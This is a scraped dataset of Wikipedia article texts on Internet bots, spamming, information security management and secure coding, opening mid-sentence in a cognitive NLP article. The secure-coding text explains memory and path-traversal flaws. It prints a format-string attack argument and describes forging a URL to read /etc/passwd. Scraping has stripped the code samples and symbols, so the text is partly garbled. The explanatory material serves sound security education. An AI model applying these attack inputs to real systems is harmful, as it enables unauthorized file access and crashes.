through thought, experience, and the senses. 47 Cognitive science is the interdisciplinary, scientific study of the mind and its processes. 48 Cognitive linguistics is an interdisciplinary branch of linguistics, combining knowledge and research from both psychology and linguistics. 49 Especially during the age of symbolic NLP, the area of computational linguistics maintained strong ties with cognitive studies. As an example, George Lakoff offers a methodology to build natural language processing (NLP) algorithms through the perspective of cognitive science, along with the findings of cognitive linguistics, 50 with two defining aspects: Ties with cognitive linguistics are part of the historical heritage of NLP, but they have been less frequently addressed since the statistical turn during the 1990s. Nevertheless, approaches to develop cognitive models towards technically operationalizable frameworks have been pursued in the context of various frameworks, e.g., of cognitive grammar, 53 functional grammar, 54 construction grammar, 55 computational psycholinguistics and cognitive neuroscience (e.g., ACT-R), however, with limited uptake in mainstream NLP (as measured by presence on major conferences 56 of the ACL). More recently, ideas of cognitive NLP have been revived as an approach to achieve explainability, e.g., under the notion of "cognitive AI". 57 Likewise, ideas of cognitive NLP are inherent to neural models multimodal NLP (although rarely made explicit) 58 and developments in artificial intelligence, specifically tools and technologies using large language model approaches 59 and new directions in artificial general intelligence based on the free energy principle 60 by British neuroscientist and theoretician at University College London Karl J. Friston. |
486 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Internet_bot | An fake bot, web robot, robot or simply bot (an abbreviation of robot), 1 is a software application that runs automated tasks (scripts) on the Internet, usually with the intent to imitate human activity, such as messaging, on a large scale. 2 An Internet bot plays the client role in a client server model whereas the server role is usually played by web servers. Internet bots are able to perform simple and repetitive tasks much faster than a person could ever do. The most extensive use of bots is for web crawling, in which an automated script fetches, analyzes and files information from web servers. More than half of all web traffic is generated by bots. 3 Efforts by web servers to restrict bots vary. Some servers have a robots.txt file that contains the rules governing bot behavior on that server. Any bot that does not follow the rules could, in theory, be denied access to or removed from the affected website. If the posted text file has no associated program software app, then adhering to the rules is entirely voluntary. There would be no way to enforce the rules or to ensure that a bot's creator or implementer reads or acknowledges the robots.txt file. Some bots are "good", e.g. search engine spiders, while others are used to launch malicious attacks on political campaigns, for example. 3 Some bots communicate with users of Internet-based services, via instant messaging (IM), Internet Relay Chat (IRC), or other web interfaces such as Facebook bots and Twitter bots. These chatbots may allow people to ask questions in plain English and then formulate a response. Such bots can often handle reporting weather, zip code information, sports scores, currency or other unit conversions, etc. 4 Others are used for entertainment, such as SmarterChild on AOL Instant Messenger and MSN Messenger. citation needed Additional roles of an IRC bot may be to listen on a conversation channel, and to comment on certain phrases uttered by the participants (based on pattern matching). This is sometimes used as a help service for new users or to censor profanity. citation needed Social bots are sets of algorithms that take on the duties of repetitive sets of instructions in order to establish a service or connection among social networking users. Among the various designs of networking bots, the most common are chat bots, algorithms designed to converse with a human user, and social bots, algorithms designed to mimic human behaviors to converse with patterns similar to those of a human user. The history of social botting can be traced back to Alan Turing in the 1950s and his vision of designing sets of instructional code approved by the Turing test. In the 1960s Joseph Weizenbaum created ELIZA, a natural language processing computer program considered an early indicator of artificial intelligence algorithms. ELIZA inspired computer programmers to design tasked programs that can match behavior patterns to their sets of instruction. As a result, natural language processing has become an influencing factor to the development of artificial intelligence and social bots. And as information and thought see a progressive mass spreading on social media websites, innovative technological advancements are made following the same pattern. citation needed Reports of political interferences in recent elections, including the 2016 US and 2017 UK general elections, 5 have set the notion of bots being more prevalent because of the ethics that is challenged between the bot's design and the bot's designer. Emilio Ferrara, a computer scientist from the University of Southern California reporting on Communications of the ACM, 6 said the lack of resources available to implement fact-checking and information verification results in the large volumes of false reports and claims made about these bots on social media platforms. In the case of Twitter, most of these bots are programmed with search filter capabilities that target keywords and phrases favoring political agendas and then retweet them. While the attention of bots is programmed to spread unverified information throughout the social media platforms, 7 it is a challenge that programmers face in the wake of a hostile political climate. The Bot Effect is what Ferrera reported as the socialization of bots and human users creating a vulnerability to the leaking of personal information and polarizing influences outside the ethics of the bot's code, and was confirmed by Guillory Kramer in his study where he observed the behavior of emotionally volatile users and the impact the bots have on them, altering their perception of reality. citation needed There has been a great deal of controversy about the use of bots in an automated trading function. Auction website eBay took legal action in an attempt to suppress a third-party company from using bots to look for bargains on its site; this approach backfired on eBay and attracted the attention of further bots. The United Kingdom-based bet exchange, Betfair, saw such a large amount of traffic coming from bots that it launched a WebService API aimed at bot programmers, through which it can actively manage bot interactions. citation needed Bot farms are known to be used in online app stores, like the Apple App Store and Google Play, to manipulate positions 8 or increase positive ratings reviews. 9 A rapidly growing, benign form of internet bot is the chatbot. From 2016, when Facebook Messenger allowed developers to place chatbots on their platform, there has been an exponential growth of their use on that app alone. 30,000 bots were created for Messenger in the first six months, rising to 100,000 by September 2017. 10 Avi Ben Ezra, CTO of SnatchBot, told Forbes that evidence from the use of their chatbot building platform pointed to a near future saving of millions of hours of human labor as 'live chat' on websites was replaced with bots. 11 Companies use internet bots to increase online engagement and streamline communication. Companies often use bots to cut down on cost; instead of employing people to communicate with consumers, companies have developed new ways to be efficient. These chatbots are used to answer customers' questions: for example, Domino's developed a chatbot that can take orders via Facebook Messenger. Chatbots allow companies to allocate their employees' time to other tasks. 12 One example of the malicious use of bots is the coordination and operation of an automated attack on networked computers, such as a denial-of-service attack by a botnet. Internet bots or web bots can also be used to commit click fraud and more recently have appeared around MMORPG games as computer game bots. Another category is represented by spambots, internet bots that attempt to spam large amounts of content on the Internet, usually adding advertising links. More than 94.2% of websites have experienced a bot attack. 3 There are malicious bots (and botnets) of the following types: in 2012, journalist Percy von Lipinski reported that he discovered millions of bots or botted or pinged views at CNN iReport. CNN iReport quietly removed millions of views from the account of iReporter Chris Morrow. 19 It is not known if the ad revenue received by CNN from the fake views was ever returned to the advertisers. citation needed The most widely used anti-bot technique is the use of CAPTCHA. Examples of providers include Recaptcha, Minteye, Solve Media and NuCaptcha. However, captchas are not foolproof in preventing bots, as they can often be circumvented by computer character recognition, security holes, and outsourcing captcha solving to cheap laborers. citation needed There are two main concerns with bots: clarity and face-to-face support. The cultural background of human beings affects the way they communicate with social bots. citation needed Many people believe that bots are vastly less intelligent than humans and so they are not worthy of our respect. 2 Min-Sun Kim proposed five concerns or issues that may arise when communicating with a social robot, and they are avoiding the damage of peoples' feelings, minimizing impositions, disapproval from others, clarity issues, and how effective their messages may come across. 2 People who oppose social robots argue that they also take away from the genuine creations of human relationships. 2 |
487 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Spamming | Spamming is the use of messaging systems to send multiple unsolicited messages (spam) to large numbers of recipients for the purpose of commercial advertising, non-commercial proselytizing, or any prohibited purpose (especially phishing), or simply repeatedly sending the same message to the same user. While the most widely recognized form of spam is email spam, the term is applied to similar abuses in other media: instant messaging spam, Usenet newsgroup spam, Web search engine spam, spam in blogs, wiki spam, online classified ads spam, mobile phone messaging spam, Internet forum spam, junk fax transmissions, social spam, spam mobile apps, 1 television advertising and file sharing spam. It is named after Spam, a luncheon meat, by way of a Monty Python sketch about a restaurant that has Spam in almost every dish in which Vikings annoyingly sing "Spam" repeatedly. 2 Spamming remains economically viable because advertisers have no operating costs beyond the management of their mailing lists, servers, infrastructures, IP ranges, and domain names, and it is difficult to hold senders accountable for their mass mailings. The costs, such as lost productivity and fraud, are borne by the public and by Internet service providers, which have added extra capacity to cope with the volume. Spamming has been the subject of legislation in many jurisdictions. 3 A person who creates spam is called a spammer. 4 The term spam is derived from the 1970 "Spam" sketch of the BBC sketch comedy television series Monty Python's Flying Circus. 5 6 The sketch, set in a cafe, has a waitress reading out a menu where every item but one includes the Spam canned luncheon meat. As the waitress recites the Spam-filled menu, a chorus of Viking patrons drown out all conversations with a song, repeating "Spam, Spam, Spam, Spam… Lovely Spam Wonderful Spam . 7 In the 1980s the term was adopted to describe certain abusive users who frequented BBSs and MUDs, who would repeat "Spam" a huge number of times to scroll other users' text off the screen. 8 In early chat-room services like PeopleLink and the early days of Online America (later known as America Online or AOL), they actually flooded the screen with quotes from the Monty Python sketch. citation needed This was used as a tactic by insiders of a group that wanted to drive newcomers out of the room so the usual conversation could continue. It was also used to prevent members of rival groups from chatting—for instance, Star Wars fans often invaded Star Trek chat rooms, filling the space with blocks of text until the Star Trek fans left. 9 It later came to be used on Usenet to mean excessive multiple posting—the repeated posting of the same message. The unwanted message would appear in many, if not all newsgroups, just as Spam appeared in all the menu items in the Monty Python sketch. One of the earliest people to use "spam" in this sense was Joel Furr. 10 11 This use had also become established—to "spam" Usenet was to flood newsgroups with junk messages. The word was also attributed to the flood of "Make Money Fast" messages that clogged many newsgroups during the 1990s. citation needed In 1998, the New Oxford Dictionary of English, which had previously only defined "spam" in relation to the trademarked food product, added a second definition to its entry for "spam": "Irrelevant or inappropriate messages sent on the Internet to a large number of newsgroups or users. There was also an effort to differentiate between types of newsgroup spam. Messages that were crossposted to too many newsgroups at once, as opposed to those that were posted too frequently, were called "velveeta" (after a cheese product), but this term did not persist. 12 In the late 19th century, Western Union allowed telegraphic messages on its network to be sent to multiple destinations. The first recorded instance of a mass unsolicited commercial telegram is from May 1864, when some British politicians received an unsolicited telegram advertising a dentist. 13 The earliest documented spam (although the term had not yet been coined 14 ) was a message advertising the availability of a new model of Digital Equipment Corporation computers sent by Gary Thuerk to 393 recipients on ARPANET on May 3, 1978. 10 Rather than send a separate message to each person, which was the standard practice at the time, he had an assistant, Carl Gartley, write a single mass email. Reaction from the net community was fiercely negative, but the spam did generate some sales. 15 16 Spamming had been practiced as a prank by participants in multi-user dungeon games, to fill their rivals' accounts with unwanted electronic junk. 16 The first major commercial spam incident started on March 5, 1994, when a husband and wife team of lawyers, Laurence Canter and Martha Siegel, began using bulk Usenet posting to advertise immigration law services. The incident was commonly termed the "Green Card spam", after the subject line of the postings. Defiant in the face of widespread condemnation, the attorneys claimed their detractors were hypocrites or "zealots", claimed they had a free speech right to send unwanted commercial messages, and labeled their opponents "anti-commerce radicals". The couple wrote a controversial book entitled How to Make a Fortune on the Information Superhighway. 16 An early example of nonprofit fundraising bulk posting via Usenet also occurred in 1994 on behalf of CitiHope, an NGO attempting to raise funds to rescue children at risk during the Bosnian War. However, as it was a violation of their terms of service, the ISP Panix deleted all of the bulk posts from Usenet, only missing three copies citation needed . Within a few years, the focus of spamming (and anti-spam efforts) moved chiefly to email, where it remains today. 8 By 1999, Khan C. Smith, a well known hacker at the time, had begun to commercialize the bulk email industry and rallied thousands into the business by building more friendly bulk email software and providing internet access illegally hacked from major ISPs such as Earthlink and Botnets. 17 By 2009 the majority of spam sent around the World was in the English language; spammers began using automatic translation services to send spam in other languages. 18 Email spam, also known as unsolicited bulk email (UBE), or junk mail, is the practice of sending unwanted email messages, frequently with commercial content, in large quantities. 19 Spam in email started to become a problem when the Internet was opened for commercial use in the mid 1990s. It grew exponentially over the following years, and by 2007 it constituted about 80% to 85% of all e-mail, by a conservative estimate. 20 Pressure to make email spam illegal has resulted in legislation in some jurisdictions, but less so in others. The efforts taken by governing bodies, security systems and email service providers seem to be helping to reduce the volume of email spam. According to "2014 Internet Security Threat Report, Volume 19" published by Symantec Corporation, spam volume dropped to 66% of all email traffic. 21 An industry of email address harvesting is dedicated to collecting email addresses and selling compiled databases. 22 Some of these address-harvesting approaches rely on users not reading the fine print of agreements, resulting in their agreeing to send messages indiscriminately to their contacts. This is a common approach in social networking spam such as that generated by the social networking site Quechup. 23 Instant messaging spam makes use of instant messaging systems. Although less prevalent than its e-mail counterpart, according to a report from Ferris Research, 500 million spam IMs were sent in 2003, twice the level of 2002. 24 Newsgroup spam is a type of spam where the targets are Usenet newsgroups. Spamming of Usenet newsgroups actually pre-dates e-mail spam. Usenet convention defines spamming as excessive multiple posting, that is, the repeated posting of a message (or substantially similar messages). The prevalence of Usenet spam led to the development of the Breidbart Index as an objective measure of a message's "spamminess". Forum spam is the creation of advertising messages on Internet forums. It is generally done by automated spambots. Most forum spam consists of links to external sites, with the dual goals of increasing search engine visibility in highly competitive areas such as weight loss, pharmaceuticals, gambling, pornography, real estate or loans, and generating more traffic for these commercial websites. Some of these links contain code to track the spambot's identity; if a sale goes through, the spammer behind the spambot earns a commission. Mobile phone spam is directed at the text messaging service of a mobile phone. This can be especially irritating to customers not only for the inconvenience, but also because of the fee they may be charged per text message received in some markets. To comply with CAN-SPAM regulations in the US, SMS messages now must provide options of HELP and STOP, the latter to end communication with the advertiser via SMS altogether. Despite the high number of phone users, there has not been so much phone spam, because there is a charge for sending SMS. Recently, there are also observations of mobile phone spam delivered via browser push notifications. These can be a result of allowing websites which are malicious or delivering malicious ads to send a user notifications. 25 Facebook and Twitter are not immune to messages containing spam links. Spammers hack into accounts and send false links under the guise of a user's trusted contacts such as friends and family. 26 As for Twitter, spammers gain credibility by following verified accounts such as that of Lady Gaga; when that account owner follows the spammer back, it legitimizes the spammer. 27 Twitter has studied what interest structures allow their users to receive interesting tweets and avoid spam, despite the site using the broadcast model, in which all tweets from a user are broadcast to all followers of the user. 28 Spammers, out of malicious intent, post either unwanted (or irrelevant) information or spread misinformation on social media platforms. 29 Spreading beyond the centrally managed social networking platforms, user-generated content increasingly appears on business, government, and nonprofit websites worldwide. Fake accounts and comments planted by computers programmed to issue social spam can infiltrate these websites. 30 Blog spam is spamming on weblogs. In 2003, this type of spam took advantage of the open nature of comments in the blogging software Movable Type by repeatedly placing comments to various blog posts that provided nothing more than a link to the spammer's commercial web site. 31 Similar attacks are often performed against wikis and guestbooks, both of which accept user contributions. Another possible form of spam in blogs is the spamming of a certain tag on websites such as Tumblr. In actual video spam, the uploaded video is given a name and description with a popular figure or event that is likely to draw attention, or within the video a certain image is timed to come up as the video's thumbnail image to mislead the viewer, such as a still image from a feature film, purporting to be a part-by-part piece of a movie being pirated, e.g. Big Buck Bunny Full Movie Online - Part 1 10 HD, a link to a supposed keygen, trainer, ISO file for a video game, or something similar. The actual content of the video ends up being totally unrelated, a Rickroll, offensive, or simply on-screen text of a link to the site being promoted. 32 In some cases, the link in question may lead to an online survey site, a password-protected archive file with instructions leading to the aforementioned survey (though the survey, and the archive file itself, is worthless and does not contain the file in question at all), or in extreme cases, malware. 33 Others may upload videos presented in an infomercial-like format selling their product which feature actors and paid testimonials, though the promoted product or service is of dubious quality and would likely not pass the scrutiny of a standards and practices department at a television station or cable network. VoIP spam is VoIP (Voice over Internet Protocol) spam, usually using SIP (Session Initiation Protocol). This is nearly identical to telemarketing calls over traditional phone lines. When the user chooses to receive the spam call, a pre-recorded spam message or advertisement is usually played back. This is generally easier for the spammer as VoIP services are cheap and easy to anonymize over the Internet, and there are many options for sending mass number of calls from a single location. Accounts or IP addresses being used for VoIP spam can usually be identified by a large number of outgoing calls, low call completion and short call length. Academic search engines enable researchers to find academic literature and are used to obtain citation data for calculating author-level metrics. Researchers from the University of California, Berkeley and OvGU demonstrated that most (web-based) academic search engines, especially Google Scholar are not capable of identifying spam attacks. 34 The researchers manipulated the citation counts of articles, and managed to make Google Scholar index complete fake articles, some containing advertising. 34 Spamming in mobile app stores include (i) apps that were automatically generated and as a result do not have any specific functionality or a meaningful description; (ii) multiple instances of the same app being published to obtain increased visibility in the app market; and (iii) apps that make excessive use of unrelated keywords to attract users through unintended searches. 35 Bluespam, or the action of sending spam to Bluetooth-enabled devices, is another form of spam that has developed in recent years. 36 E-mail and other forms of spamming have been used for purposes other than advertisements. Many early Usenet spams were religious or political. Serdar Argic, for instance, spammed Usenet with historical revisionist screeds. A number of evangelists have spammed Usenet and e-mail media with preaching messages. A growing number of criminals are also using spam to perpetrate various sorts of fraud. a In 2011 the origins of spam were analyzed by Cisco Systems. They provided a report that shows spam volume originating from countries worldwide. 37 Hormel Foods Corporation, the maker of SPAM luncheon meat, does not object to the Internet use of the term "spamming". However, they did ask that the capitalized word "Spam" be reserved to refer to their product and trademark. 38 The European Union's Internal Market Commission estimated in 2001 that "junk email" cost Internet users 10 billion per year worldwide. 39 The California legislature found that spam cost United States organizations alone more than $13 billion in 2007, including lost productivity and the additional equipment, software, and manpower needed to combat the problem. 40 Spam's direct effects include the consumption of computer and network resources, and the cost in human time and attention of dismissing unwanted messages. 41 Large companies who are frequent spam targets utilize numerous techniques to detect and prevent spam. 42 The cost to providers of search engines is significant: "The secondary consequence of spamming is that search engine indexes are inundated with useless pages, increasing the cost of each processed query". 4 The costs of spam also include the collateral costs of the struggle between spammers and the administrators and users of the media threatened by spamming. 43 Email spam exemplifies a tragedy of the commons: spammers use resources (both physical and human), without bearing the entire cost of those resources. In fact, spammers commonly do not bear the cost at all. This raises the costs for everyone. 44 In some ways spam is even a potential threat to the entire email system, as operated in the past. Since email is so cheap to send, a tiny number of spammers can saturate the Internet with junk mail. Although only a tiny percentage of their targets are motivated to purchase their products (or fall victim to their scams), the low cost may provide a sufficient conversion rate to keep the spamming alive. Furthermore, even though spam appears not to be economically viable as a way for a reputable company to do business, it suffices for professional spammers to convince a tiny proportion of gullible advertisers that it is viable for those spammers to stay in business. Finally, new spammers go into business every day, and the low costs allow a single spammer to do a lot of harm before finally realizing that the business is not profitable. citation needed Some companies and groups "rank" spammers; spammers who make the news are sometimes referred to by these rankings. 45 46 In all cases listed above, including both commercial and non-commercial, "spam happens" because of a positive cost benefit analysis result; if the cost to recipients is excluded as an externality the spammer can avoid paying. citation needed Cost is the combination of: Benefit is the total expected profit from spam, which may include any combination of the commercial and non-commercial reasons listed above. It is normally linear, based on the incremental benefit of reaching each additional spam recipient, combined with the conversion rate. The conversion rate for botnet-generated spam has recently been measured to be around one in 12,000,000 for pharmaceutical spam and one in 200,000 for infection sites as used by the Storm botnet. 47 The authors of the study calculating those conversion rates noted, "After 26 days, and almost 350 million e-mail messages, only 28 sales resulted. Spam can be used to spread computer viruses, trojan horses or other malicious software. The objective may be identity theft, or worse (e.g., advance fee fraud). Some spam attempts to capitalize on human greed, while some attempts to take advantage of the victims' inexperience with computer technology to trick them (e.g., phishing). One of the world's most prolific spammers, Robert Alan Soloway, was arrested by US authorities on May 31, 2007. 48 Described as one of the top ten spammers in the world, Soloway was charged with 35 criminal counts, including mail fraud, wire fraud, e-mail fraud, aggravated identity theft, and money laundering. 48 Prosecutors allege that Soloway used millions of "zombie" computers to distribute spam during 2003. 49 This is the first case in which US prosecutors used identity theft laws to prosecute a spammer for taking over someone else's Internet domain name. 50 In an attempt to assess potential legal and technical strategies for stopping illegal spam, a study cataloged three months of online spam data and researched website naming and hosting infrastructures. The study concluded that: 1) half of all spam programs have their domains and servers distributed over just eight percent or fewer of the total available hosting registrars and autonomous systems, with 80 percent of spam programs overall being distributed over just 20 percent of all registrars and autonomous systems; 2) of the 76 purchases for which the researchers received transaction information, there were only 13 distinct banks acting as credit card acquirers and only three banks provided the payment servicing for 95 percent of the spam-advertised goods in the study; and, 3) a "financial blacklist" of banking entities that do business with spammers would dramatically reduce monetization of unwanted e-mails. Moreover, this blacklist could be updated far more rapidly than spammers could acquire new banking resources, an asymmetry favoring anti-spam efforts. 51 An ongoing concern expressed by parties such as the Electronic Frontier Foundation and the American Civil Liberties Union has to do with so-called "stealth blocking", a term for ISPs employing aggressive spam blocking without their users' knowledge. These groups' concern is that ISPs or technicians seeking to reduce spam-related costs may select tools that (either through error or design) also block non-spam e-mail from sites seen as "spam-friendly". Few object to the existence of these tools; it is their use in filtering the mail of users who are not informed of their use that draws fire. 52 Even though it is possible in some jurisdictions to treat some spam as unlawful merely by applying existing laws against trespass and conversion, some laws specifically targeting spam have been proposed. In 2004, United States passed the CAN-SPAM Act of 2003 that provided ISPs with tools to combat spam. This act allowed Yahoo to successfully sue Eric Head who settled the lawsuit for several thousand U.S. dollars in June 2004. But the law is criticized by many for not being effective enough. Indeed, the law was supported by some spammers and organizations that support spamming, and opposed by many in the anti-spam community. citation needed Earthlink won a $25 million judgment against one of the most notorious and active "spammers" Khan C. Smith in 2001 for his role in founding the modern spam industry which dealt billions in economic damage and established thousands of spammers into the industry. 53 His email efforts were said to make up more than a third of all Internet email being sent from 1999 until 2002. Sanford Wallace and Cyber Promotions were the target of a string of lawsuits, many of which were settled out of court, up through a 1998 Earthlink settlement 54 that put Cyber Promotions out of business. Attorney Laurence Canter was disbarred by the Tennessee Supreme Court in 1997 for sending prodigious amounts of spam advertising his immigration law practice. In 2005, Jason Smathers, a former America Online employee, pleaded guilty to charges of violating the CAN-SPAM Act. In 2003, he sold a list of approximately 93 million AOL subscriber e-mail addresses to Sean Dunaway who sold the list to spammers. 55 56 In 2007, Robert Soloway lost a case in a federal court against the operator of a small Oklahoma-based Internet service provider who accused him of spamming. U.S. Judge Ralph G. Thompson granted a motion by plaintiff Robert Braver for a default judgment and permanent injunction against him. The judgment includes a statutory damages award of about $10 million under Oklahoma law. 57 In June 2007, two men were convicted of eight counts stemming from sending millions of e-mail spam messages that included hardcore pornographic images. Jeffrey A. Kilbride, 41, of Venice, California was sentenced to six years in prison, and James R. Schaffer, 41, of Paradise Valley, Arizona, was sentenced to 63 months. In addition, the two were fined $100,000, ordered to pay $77,500 in restitution to AOL, and ordered to forfeit more than $1.1 million, the amount of illegal proceeds from their spamming operation. 58 The charges included conspiracy, fraud, money laundering, and transportation of obscene materials. The trial, which began on June 5, was the first to include charges under the CAN-SPAM Act of 2003, according to a release from the Department of Justice. The specific law that prosecutors used under the CAN-Spam Act was designed to crack down on the transmission of pornography in spam. 59 In 2005, Scott J. Filary and Donald E. Townsend of Tampa, Florida were sued by Florida Attorney General Charlie Crist for violating the Florida Electronic Mail Communications Act. 60 The two spammers were required to pay $50,000 USD to cover the costs of investigation by the state of Florida, and a $1.1 million penalty if spamming were to continue, the $50,000 was not paid, or the financial statements provided were found to be inaccurate. The spamming operation was successfully shut down. 61 Edna Fiedler of Olympia, Washington, on June 25, 2008, pleaded guilty in a Tacoma court and was sentenced to two years imprisonment and five years of supervised release or probation in an Internet $1 million "Nigerian check scam. She conspired to commit bank, wire and mail fraud, against US citizens, specifically using Internet by having had an accomplice who shipped counterfeit checks and money orders to her from Lagos, Nigeria, the previous November. Fiedler shipped out $609,000 fake check and money orders when arrested and prepared to send additional $1.1 million counterfeit materials. Also, the U.S. Postal Service recently intercepted counterfeit checks, lottery tickets and eBay overpayment schemes with a value of $2.1 billion. 62 63 In a 2009 opinion, Gordon v. Virtumundo, Inc., 575 F.3d 1040, the Ninth Circuit assessed the standing requirements necessary for a private plaintiff to bring a civil cause of action against spam senders under the CAN-SPAM Act of 2003, as well as the scope of the CAN-SPAM Act's federal preemption clause. 64 In the first successful case of its kind, Nigel Roberts from the Channel Islands won 270 against Media Logistics UK who sent junk e-mails to his personal account. 65 In January 2007, a Sheriff Court in Scotland awarded Mr. Gordon Dick 750 (the then maximum sum that could be awarded in a Small Claim action) plus expenses of 618.66, a total of 1368.66 against Transcom Internet Services Ltd. 66 for breaching anti-spam laws. 67 Transcom had been legally represented at earlier hearings, but were not represented at the proof, so Gordon Dick got his decree by default. It is the largest amount awarded in compensation in the United Kingdom since Roberts v Media Logistics case in 2005. Despite the statutory tort that is created by the Regulations implementing the EC Directive, few other people have followed their example. As the Courts engage in active case management, such cases would probably now be expected to be settled by mediation and payment of nominal damages. In October 2008, an international internet spam operation run from New Zealand was cited by American authorities as one of the world's largest, and for a time responsible for up to a third of all unwanted e-mails. In a statement the US Federal Trade Commission (FTC) named Christchurch's Lance Atkinson as one of the principals of the operation. New Zealand's Internal Affairs announced it had lodged a $200,000 claim in the High Court against Atkinson and his brother Shane Atkinson and courier Roland Smits, after raids in Christchurch. This marked the first prosecution since the Unsolicited Electronic Messages Act (UEMA) was passed in September 2007. The FTC said it had received more than three million complaints about spam messages connected to this operation, and estimated that it may be responsible for sending billions of illegal spam messages. The US District Court froze the defendants' assets to preserve them for consumer redress pending trial. 68 U.S. co-defendant Jody Smith forfeited more than $800,000 and faces up to five years in prison for charges to which he pleaded guilty. 69 While most countries either outlaw or at least ignore spam, Bulgaria is the first and only country to legalize it. 70 According to the Bulgarian E-Commerce act 71 ( .5,6) anyone can send spam to mailboxes published as owned by a company or organization as long as there is a "clear and straight indication that the message is unsolicited commercial e-mail" (" ") in the message body. This made lawsuits against Bulgarian ISP's and public e-mail providers with antispam policy possible, as they are obstructing legal commerce activity and thus violate Bulgarian antitrust acts. While there are no such lawsuits until now, several cases of spam obstruction are currently awaiting decision in the Bulgarian Antitrust Commission ( ) and can end with serious fines for the ISPs in question. when? The law contains other dubious provisions — for example, the creation of a nationwide public electronic register of e-mail addresses that do not want to receive spam. 72 It is usually abused as the perfect source for e-mail address harvesting, because publishing invalid or incorrect information in such a register is a criminal offense in Bulgaria. |
488 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Information_security_management | Information security management (ISM) defines and manages controls that an organization needs to implement to ensure that it is sensibly protecting the confidentiality, availability, and integrity of assets from threats and vulnerabilities. The core of ISM includes information risk management, a process that involves the assessment of the risks an organization must deal with in the management and protection of assets, as well as the dissemination of the risks to all appropriate stakeholders. 1 This requires proper asset identification and valuation steps, including evaluating the value of confidentiality, integrity, availability, and replacement of assets. 2 As part of information security management, an organization may implement an information security management system and other best practices found in the ISO IEC 27001, ISO IEC 27002, and ISO IEC 27035 standards on information security. 3 4 Managing information security in essence means managing and mitigating the various threats and vulnerabilities to assets, while at the same time balancing the management effort expended on potential threats and vulnerabilities by gauging the probability of them actually occurring. 1 5 6 A meteorite crashing into a server room is certainly a threat, for example, but an information security officer will likely put little effort into preparing for such a threat. Just as people don't have to start preparing for the end of the world just because of the existence of a global seed bank. 7 After appropriate asset identification and valuation have occurred, 2 risk management and mitigation of risks to those assets involves the analysis of the following issues: 5 6 8 Once a threat and or vulnerability has been identified and assessed as having sufficient impact likelihood on information assets, a mitigation plan can be enacted. The mitigation method is chosen largely depends on which of the seven information technology (IT) domains the threat and or vulnerability resides in. The threat of user apathy toward security policies (the user domain) will require a much different mitigation plan than the one used to limit the threat of unauthorized probing and scanning of a network (the LAN-to-WAN domain). 8 An information security management system (ISMS) represents the collation of all the interrelated interacting information security elements of an organization so as to ensure policies, procedures, and objectives can be created, implemented, communicated, and evaluated to better guarantee the organization's overall information security. This system is typically influenced by an organization's needs, objectives, security requirements, size, and processes. 9 An ISMS includes and lends to risk management and mitigation strategies. Additionally, an organization's adoption of an ISMS indicates that it is systematically identifying, assessing, and managing information security risks and "will be capable of successfully addressing information confidentiality, integrity, and availability requirements. 10 However, the human factors associated with ISMS development, implementation, and practice (the user domain 8 ) must also be considered to best ensure the ISMS' ultimate success. 11 Implementing an effective information security management (including risk management and mitigation) requires a management strategy that takes note of the following: 12 Without sufficient budgetary considerations for all the above—in addition to the money allotted to standard regulatory, IT, privacy, and security issues—an information security management plan system can not fully succeed. Standards that are available to assist organizations with implementing the appropriate programs and controls to mitigate threats and vulnerabilities include the ISO IEC 27000 family of standards, the ITIL framework, the COBIT framework, and O-ISM3 2.0. The ISO IEC 27000 family represents some of the most well-known standards governing information security management and their ISMS is based on global expert opinion. They lay out the requirements for best "establishing, implementing, deploying, monitoring, reviewing, maintaining, updating, and improving information security management systems. 3 4 ITIL acts as a collection of concepts, policies, and best practices for the effective management of information technology infrastructure, service, and security, differing from ISO IEC 27001 in only a few ways. 13 14 COBIT, developed by ISACA, is a framework for helping information security personnel develop and implement strategies for information management and governance while minimizing negative impacts and controlling information security and risk management, 4 13 15 and O-ISM3 2.0 is The Open Group's technology-neutral information security model for enterprise. 16 |
489 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Secure_coding | Secure coding is the practice of developing computer software in such a way that guards against the accidental introduction of security vulnerabilities. Defects, bugs and logic flaws are consistently the primary cause of commonly exploited software vulnerabilities. 1 Through the analysis of thousands of reported vulnerabilities, security professionals have discovered that most vulnerabilities stem from a relatively small number of common software programming errors. By identifying the insecure coding practices that lead to these errors and educating developers on secure alternatives, organizations can take proactive steps to help significantly reduce or eliminate vulnerabilities in software before deployment. 2 Some scholars have suggested that in order to effectively confront threats related to cybersecurity, proper security should be coded or “baked in” to the systems. With security being designed into the software, this ensures that there will be protection against insider attacks and reduces the threat to application security. 3 Buffer overflows, a common software security vulnerability, happen when a process tries to store data beyond a fixed-length buffer. For example, if there are 8 slots to store items in, there will be a problem if there is an attempt to store 9 items. In computer memory the overflowed data may overwrite data in the next location which can result in a security vulnerability (stack smashing) or program termination (segmentation fault). 1 An example of a C program prone to a buffer overflow is If the user input is larger than the destination buffer, a buffer overflow will occur. To fix this unsafe program, use strncpy to prevent a possible buffer overflow. Another secure alternative is to dynamically allocate memory on the heap using malloc. In the above code snippet, the program attempts to copy the contents of src into dst, while also checking the return value of malloc to ensure that enough memory was able to be allocated for the destination buffer. A Format String Attack is when a malicious user supplies specific inputs that will eventually be entered as an argument to a function that performs formatting, such as printf(). The attack involves the adversary reading from or writing to the stack. The C printf function writes output to stdout. If the parameter of the printf function is not properly formatted, several security bugs can be introduced. Below is a program that is vulnerable to a format string attack. A malicious argument passed to the program could be s s s s s s s", which can crash the program from improper memory reads. Integer overflow occurs when an arithmetic operation results in an integer too large to be represented within the available space. A program which does not properly check for integer overflow introduces potential software bugs and exploits. Below is a function in C which attempts to confirm that the sum of x and y is less than or equal to a defined value MAX: The problem with the code is it does not check for integer overflow on the addition operation. If the sum of x and y is greater than the maximum possible value of an unsigned int, the addition operation will overflow and perhaps result in a value less than or equal to MAX, even though the sum of x and y is greater than MAX. Below is a function which checks for overflow by confirming the sum is greater than or equal to both x and y. If the sum did overflow, the sum would be less than x or less than y. Path traversal is a vulnerability whereby paths provided from an untrusted source are interpreted in such a way that unauthorised file access is possible. For example, consider a script that fetches an article by taking a filename, which is then read by the script and parsed. Such a script might use the following hypothetical URL to retrieve an article about dog food: If the script has no input checking, instead trusting that the filename is always valid, a malicious user could forge a URL to retrieve configuration files from the web server: Depending on the script, this may expose the etc passwd file, which on Unix-like systems contains (among others) user IDs, their login names, home directory paths and shells. (See SQL injection for a similar attack.) |
